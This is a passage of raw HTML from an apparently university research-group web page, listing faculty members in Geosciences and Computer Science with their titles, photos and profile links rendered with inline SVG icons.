29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1634 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c217-outer\">\n            <div data-colibri-id=\"182-c217\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c217 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c218\" class=\"d-block style-973 style-local-182-c218 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Faris-e1697216253732.jpg\" class=\"wp-image-1814 style-973-image style-local-182-c218-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c218-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c219\" class=\"h-global-transition-all h-heading style-974 style-local-182-c219 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c219\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Faris Hawamdeh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c220\" class=\"h-text h-text-component style-975 style-local-182-c220 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Academic Professional\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c221\" class=\"h-text h-text-component style-976 style-local-182-c221 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c222\" class=\"style-977 style-local-182-c222 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/faris-hawamdeh/?trk=public_profile_publication_contributor-image\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 